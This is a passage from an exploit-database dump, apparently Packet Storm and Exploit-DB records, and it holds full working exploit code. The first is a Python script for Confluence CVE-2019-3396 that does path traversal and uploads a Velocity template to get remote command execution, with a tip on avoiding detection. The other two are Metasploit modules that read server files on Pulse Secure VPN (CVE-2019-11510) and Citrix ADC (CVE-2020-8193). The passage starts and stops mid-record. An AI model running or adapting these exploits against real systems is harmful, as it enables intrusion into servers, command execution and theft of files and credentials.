\n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = 
subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. 
\n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property 
\ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. 
\n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve 
path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") 
\noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. 
\n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. 
\ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. 
\n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt"}, {"lastseen": "2019-08-22T05:38:44", "description": "", "cvss3": {}, "published": 
"2019-08-21T00:00:00", "type": "packetstorm", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
\nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}], "exploitdb": [{"lastseen": "2023-12-03T18:52:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", 
"integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-11-13T00:00:00", "type": "exploitdb", "title": "Citrix ADC NetScaler - Local File Inclusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-11-13T00:00:00", "id": "EDB-ID:49038", "href": "https://www.exploit-db.com/exploits/49038", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::Scanner\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',\r\n 'Description' => %{\r\n The remote device is affected by multiple vulnerabilities.\r\n\r\n An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.\r\n An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit\r\n this to bypass authorization (CVE-2020-8193).\r\n\r\n And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.\r\n },\r\n 'Author' => [\r\n 'Donny Maasland', # Discovery\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module 
author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-8193'],\r\n ['CVE', '2020-8195'],\r\n ['CVE', '2020-8196'],\r\n ['URL', 'https://dmaasland.github.io/posts/citrix.html'],\r\n ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],\r\n ['URL', 'https://github.com/jas502n/CVE-2020-8193']\r\n ],\r\n 'DisclosureDate' => '2020-07-09',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n }\r\n ))\r\n\r\n register_options([\r\n OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),\r\n OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def create_session\r\n params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\",\r\n 'ctype' => 'application/xml',\r\n 'headers' => {\r\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\r\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)\r\n },\r\n 'data' => '<appfwprofile><login></login></appfwprofile>'\r\n }\r\n request = request.merge({'cookie' => @cookie}) if @cookie\r\n\r\n response = send_request_raw(request)\r\n unless response && response.code == 406\r\n print_error(\"#{@message_prefix} - No response to session request.\")\r\n return\r\n end\r\n\r\n response.get_cookies\r\n end\r\n\r\n def fix_session_rand\r\n response = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'sid' => 'nsroot',\r\n 'username' => 'nsroot',\r\n 'force_setup' => '1'\r\n }\r\n )\r\n\r\n if response && response.code == 302\r\n location = response.headers['location']\r\n\r\n response = 
send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => location,\r\n 'cookie' => @cookie\r\n )\r\n\r\n return unless response && response.code == 200\r\n end\r\n\r\n response.to_s.scan(/rand = \"([^\"]+)\"/).join\r\n end\r\n\r\n def read_lfi(path, var_rand)\r\n params = \"filter=path:#{path}\"\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\",\r\n 'cookie' => @cookie,\r\n 'ctype' => 'application/xml',\r\n 'headers' => {\r\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\r\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),\r\n 'rand_key' => var_rand\r\n },\r\n 'data' => '<clipermission></clipermission>'\r\n }\r\n\r\n response = send_request_raw(request)\r\n end\r\n\r\n def run_host(ip)\r\n proto = (datastore['SSL'] ? 'https' : 'http')\r\n @message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\"\r\n\r\n @cookie = create_session\r\n if @cookie && @cookie =~ /SESSID/\r\n print_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\")\r\n\r\n var_rand = fix_session_rand\r\n unless var_rand\r\n print_error(\"#{@message_prefix} - Unable to get rand value.\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n print_status(\"#{@message_prefix} - Got rand: #{var_rand}\")\r\n\r\n print_status(\"#{@message_prefix} - Re-breaking session...\")\r\n create_session\r\n\r\n case datastore['MODE']\r\n when /discovery/\r\n response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n if response.body.include? 
('root:*:0:0:')\r\n print_warning(\"#{@message_prefix} - Vulnerable.\")\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n when /interactive/\r\n # TODO: parse response\r\n response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n print_line(\"#{response.body}\")\r\n end\r\n\r\n return\r\n when /sessions/\r\n # TODO: parse response\r\n response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n print_line(\"#{response.body}\")\r\n end\r\n\r\n return\r\n end\r\n end\r\n print_good(\"#{@message_prefix} - Not Vulnerable.\")\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/49038", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2023-12-03T17:22:33", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": 